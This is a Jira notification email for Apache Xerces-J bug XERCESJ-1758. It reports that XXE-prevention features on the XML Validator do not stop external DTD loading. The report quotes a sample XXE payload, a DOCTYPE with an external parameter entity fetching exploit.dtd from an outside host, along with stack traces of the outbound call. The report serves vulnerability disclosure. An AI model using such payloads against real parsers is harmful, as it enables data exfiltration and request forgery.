You are viewing a plain text version of this content. The canonical link for it is here.
Posted to j-dev@xerces.apache.org by "Samuel Hailemichael (Jira)" <xe...@xml.apache.org> on 2023/07/13 19:06:00 UTC
[jira] [Updated] (XERCESJ-1758) XML validator xxe vulnerability
[ https://issues.apache.org/jira/browse/XERCESJ-1758?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Samuel Hailemichael updated XERCESJ-1758:
-----------------------------------------
Description:
During the implementation of Validator using apache xerces, setting features that prevent XML External Entity are not working. When parsing through an XML file, I consistently get DNS callbacks when attempting to load an external dtd with a DOCTYPE declaration. I am using the latest xerces version(2.12.2)
{*}{{*}}{*}Attempt 1{*}
{code:java}
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema(schemaSources);
Validator validator = schema.newValidator();
validator.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);
validator.setFeature("http://xml.org/sax/features/external-general-entities", false);
validator.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
validator.validate(new StreamSource(new ByteArrayInputStream(<xml file in byte Array form that contains DOCTYPE>)));{code}
sample XML file
{code:java}
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd"> %xxe;]> {code}
When using a validator it doesn't throw a fatal error exception when a document containing a DOCTYPE declaration is being parsed. Here's an example of an outbound call when an XML file containing a DOCTYPE declaration is being parsed through the validator.
{code:java}
Caused by: java.io.IOException: Server returned HTTP response code: 403 for URL: https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd
at sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1914)
at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1512)
at sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(HttpsURLConnectionImpl.java:268)
at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity(Unknown Source)
at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.startPE(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.skipSeparator(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.scanDecls(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset(Unknown Source)
at org.apache.xerces.impl.XMLDocumentScannerImpl$DTDDispatcher.dispatch(Unknown Source)
at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source)
at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
at org.apache.xerces.jaxp.validation.StreamValidatorHelper.validate(Unknown Source)
at org.apache.xerces.jaxp.validation.ValidatorImpl.validate(Unknown Source)
at javax.xml.validation.Validator.validate(Validator.java:124) {code}
Instead of an outbound call, it should throw an exception for a DOCTYPE declation on the xml file. **
*Attempt 2*
{code:java}
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema();
Validator validator = schema.newValidator();
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
validator.validate(new StreamSource(new ByteArrayInputStream(<byte Array>))); {code}
This implementation is the recommended way for external entity prevention for validators but gives this error when implemented with xerces. https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#validator
{code:java}
org.xml.sax.SAXNotRecognizedException: Property 'http://javax.xml.XMLConstants/property/accessExternalDTD' is not recognized.
at org.apache.xerces.jaxp.validation.ValidatorImpl.setProperty(Unknown Source) {code}
was:
During the implementation of Validator using apache xerces, setting features that prevent XML External Entity are not working. When parsing through an XML file, I consistently get DNS callbacks when attempting to load an external dtd with a DOCTYPE declaration.
{*}{*}{*}Attempt 1{*}
{code:java}
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema(schemaSources);
Validator validator = schema.newValidator();
validator.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);
validator.setFeature("http://xml.org/sax/features/external-general-entities", false);
validator.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
validator.validate(new StreamSource(new ByteArrayInputStream(<xml file in byte Array form that contains DOCTYPE>)));{code}
When using a validator it doesn't throw a fatal error exception when a document containing a DOCTYPE declaration is being parsed. Here's an example of an outbound call when an XML file containing a DOCTYPE declaration is being parsed through the validator.
{code:java}
Caused by: java.io.IOException: Server returned HTTP response code: 403 for URL: https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd
at sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1914)
at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1512)
at sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(HttpsURLConnectionImpl.java:268)
at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity(Unknown Source)
at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.startPE(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.skipSeparator(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.scanDecls(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset(Unknown Source)
at org.apache.xerces.impl.XMLDocumentScannerImpl$DTDDispatcher.dispatch(Unknown Source)
at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source)
at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
at org.apache.xerces.jaxp.validation.StreamValidatorHelper.validate(Unknown Source)
at org.apache.xerces.jaxp.validation.ValidatorImpl.validate(Unknown Source)
at javax.xml.validation.Validator.validate(Validator.java:124) {code}
Instead of an outbound call, it should throw an exception for a DOCTYPE declation on the xml file. **
*Attempt 2*
{code:java}
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema();
Validator validator = schema.newValidator();
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
validator.validate(new StreamSource(new ByteArrayInputStream(<byte Array>))); {code}
This implementation is the recommended way for external entity prevention for validators but gives this error when implemented with xerces.
{code:java}
org.xml.sax.SAXNotRecognizedException: Property 'http://javax.xml.XMLConstants/property/accessExternalDTD' is not recognized.
at org.apache.xerces.jaxp.validation.ValidatorImpl.setProperty(Unknown Source) {code}
> XML validator xxe vulnerability
> -------------------------------
>
> Key: XERCESJ-1758
> URL: https://issues.apache.org/jira/browse/XERCESJ-1758
> Project: Xerces2-J
> Issue Type: Bug
> Components: JAXP (javax.xml.validation)
> Reporter: Samuel Hailemichael
> Priority: Major
>
> During the implementation of Validator using apache xerces, setting features that prevent XML External Entity are not working. When parsing through an XML file, I consistently get DNS callbacks when attempting to load an external dtd with a DOCTYPE declaration. I am using the latest xerces version(2.12.2)
> {*}{{*}}{*}Attempt 1{*}
> {code:java}
> SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
> Schema schema = factory.newSchema(schemaSources);
> Validator validator = schema.newValidator();
> validator.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);
> validator.setFeature("http://xml.org/sax/features/external-general-entities", false);
> validator.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
> validator.validate(new StreamSource(new ByteArrayInputStream(<xml file in byte Array form that contains DOCTYPE>)));{code}
> sample XML file
> {code:java}
> <?xml version="1.0"?>
> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd"> %xxe;]> {code}
> When using a validator it doesn't throw a fatal error exception when a document containing a DOCTYPE declaration is being parsed. Here's an example of an outbound call when an XML file containing a DOCTYPE declaration is being parsed through the validator.
> {code:java}
> Caused by: java.io.IOException: Server returned HTTP response code: 403 for URL: https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd
> at sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1914)
> at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1512)
> at sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(HttpsURLConnectionImpl.java:268)
> at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity(Unknown Source)
> at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
> at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
> at org.apache.xerces.impl.XMLDTDScannerImpl.startPE(Unknown Source)
> at org.apache.xerces.impl.XMLDTDScannerImpl.skipSeparator(Unknown Source)
> at org.apache.xerces.impl.XMLDTDScannerImpl.scanDecls(Unknown Source)
> at org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset(Unknown Source)
> at org.apache.xerces.impl.XMLDocumentScannerImpl$DTDDispatcher.dispatch(Unknown Source)
> at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source)
> at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
> at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
> at org.apache.xerces.jaxp.validation.StreamValidatorHelper.validate(Unknown Source)
> at org.apache.xerces.jaxp.validation.ValidatorImpl.validate(Unknown Source)
> at javax.xml.validation.Validator.validate(Validator.java:124) {code}
> Instead of an outbound call, it should throw an exception for a DOCTYPE declation on the xml file. **
> *Attempt 2*
> {code:java}
> SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
> Schema schema = factory.newSchema();
> Validator validator = schema.newValidator();
> validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
> validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
> validator.validate(new StreamSource(new ByteArrayInputStream(<byte Array>))); {code}
> This implementation is the recommended way for external entity prevention for validators but gives this error when implemented with xerces. https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#validator
> {code:java}
> org.xml.sax.SAXNotRecognizedException: Property 'http://javax.xml.XMLConstants/property/accessExternalDTD' is not recognized.
> at org.apache.xerces.jaxp.validation.ValidatorImpl.setProperty(Unknown Source) {code}
>
>
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: j-dev-unsubscribe@xerces.apache.org
For additional commands, e-mail: j-dev-help@xerces.apache.org